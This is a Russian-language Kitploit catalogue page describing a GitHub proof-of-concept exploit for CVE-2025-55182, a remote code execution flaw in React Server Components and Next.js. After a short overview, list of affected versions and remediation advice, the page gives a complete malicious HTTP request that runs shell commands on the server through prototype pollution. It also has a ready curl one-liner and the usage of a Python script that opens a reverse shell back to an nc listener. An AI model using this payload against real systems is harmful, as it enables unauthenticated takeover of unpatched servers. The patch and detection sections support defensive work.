Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Доказательство концепции эксплуатации для CVE-2025-55182: неаутентифицированное удалённое выполнение кода (RCE) в React Server Components через небезопасную десериализацию, позволяющее выполнение произвольных команд и получение обратных оболочек на уязвимых конечных точках RSC/Next.js. | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHub0xblackash/cve-2025-55182

CVE-2025-55182

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Доказательство концепции эксплуатации для CVE-2025-55182: неаутентифицированное удалённое выполнение кода (RCE) в React Server Components через небезопасную десериализацию, позволяющее выполнение произвольных команд и получение обратных оболочек на уязвимых конечных точках RSC/Next.js.

Поделиться

🚨 CVE-2025-55182 — React2Shell

hq720

Severity CVSS Type Status

CVE-2025-55182 — это критическая уязвимость удаленного выполнения кода (RCE), затрагивающая React Server Components (RSC).


📌 Обзор

Эта уязвимость позволяет неаутентифицированным злоумышленникам выполнять произвольный код на уязвимых серверах.

Проблема возникает из-за небезопасной десериализации в конечных точках серверных функций React Server Component.

Ненадлежащая проверка позволяет специально созданным запросам выполнять вредоносные полезные нагрузки.


🧨 Воздействие

  • 🌍 Эксплуатируется через сеть
  • 🔓 Аутентификация не требуется
  • ⚡ Низкая сложность атаки
  • 💥 Возможна полная компрометация сервера
  • 📈 Оценка CVSS: 10.0 (Максимальная серьезность)
  • Поскольку фреймворки на основе React широко распространены, поверхность атаки чрезвычайно велика.


    📦 Затронутые пакеты

    Уязвимые версии включают:

    root@kitploit:~
    react-server-dom-webpack   19.0.0 – 19.2.0
    react-server-dom-parcel    19.0.0 – 19.2.0
    react-server-dom-turbopack 19.0.0 – 19.2.0
    

    Фреймворки, построенные на основе этих пакетов (например, приложения Next.js, использующие уязвимые версии), также могут быть затронуты.


    🔎 Техническая первопричина

    Дефект вызван:

    • Небезопасная обработка сериализованного ввода
    • Десериализация на стороне сервера, происходящая до строгой проверки
    • Отсутствие адекватной защиты конечных точек

    Это позволяет злоумышленникам создавать вредоносные полезные нагрузки, которые выполняются на сервере.


    🛠 Устранение

    ✅ Немедленные действия

    • Обновите до исправленных версий React (19.2.1 или новее)
    • Пересоберите и повторно разверните приложения
    • Проверьте открытые конечные точки RSC
    • Отслеживайте логи на предмет подозрительных POST-запросов

    🧪 Советы по обнаружению

    Обратите внимание на:

    • Неожиданные POST-запросы к конечным точкам RSC
    • Подозрительные сериализованные полезные нагрузки
    • Необычное выполнение команд на стороне сервера

    📚 Сводка

    КатегорияЗначение
    VulnerabilityУдаленное выполнение кода
    Authentication Required❌ Нет
    Attack Vector🌐 Сеть
    Severity🔴 Критическая
    Exploited in Wild⚠️ Да

    Как эксплуатировать

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
    Next-Action: x
    X-Nextjs-Request-Id: b5dce965
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
    Content-Length: 740
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": "{\"then\":\"$B1337\"}",
      "_response": {
        "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
        "_chunks": "$Q2",
        "_formData": {
          "get": "$1:constructor:constructor"
        }
      }
    }
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="2"
    
    []
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    

    Вернет:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    x-nextjs-cache: HIT
    x-nextjs-prerender: 1
    Content-Type: text/x-component
    Date: Fri, 05 Dec 2025 11:53:05 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
    Content-Length: 195
    
    0:{"a":"$@1","f":"","b":"PAoMR732SpRI6Xw9cbfbD"}
    1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}
    
    
    CVE-2025-55182 2
    CVE-2025-55182 3
    CVE-2025-55182 4

    Использование

    root@kitploit:~
    ┌──(kali㉿kali)-[~/Downloads]
    └─$ curl -i -X POST http://10.48.133.212:3000/ \
    -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" \
    -H "Next-Action: x" \
    -H "Next-Router-State-Tree: b5dce965" \
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" \
    --data-binary $'------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'<COMMAND>\').toString().trim();;;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest:`${res}`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--'
    HTTP/1.1 500 Internal Server Error
    Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    x-nextjs-cache: HIT
    x-nextjs-prerender: 1
    Content-Type: text/x-component
    Date: Sat, 28 Feb 2026 10:19:04 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
    Transfer-Encoding: chunked
    
    0:{"a":"$@1","f":"","b":"3WpzTMYEK9QGOeqIBQxrR"}
    1:E{"digest":"287088506"}
    
    CVE-2025-55182 5
    CVE-2025-55182 6
    root@kitploit:~
    sudo python3 react2shell_poc.py http://10.48.133.212:3000 --cmd "whoami"
    
    • Вывод: ubuntu (или аналогично).
    root@kitploit:~
    sudo python3 react2shell_poc.py http://10.48.133.212:3000 --cmd "id"
    

    Для обратной оболочки:

    • Слушатель: nc -lvnp 4444
    • Запуск: sudo python3 react2shell_poc.py http://10.48.133.212:3000 --rev-shell --rev-ip YOUR_IP --rev-port 4444
    • Должно подключиться обратно; в ответе в digest будет показано 'shell_started'.

    ⚠️ Заключительное примечание

    Если ваше приложение использует React Server Components, немедленно установите исправление. Задержки значительно увеличивают риск воздействия.


    Скачать инструмент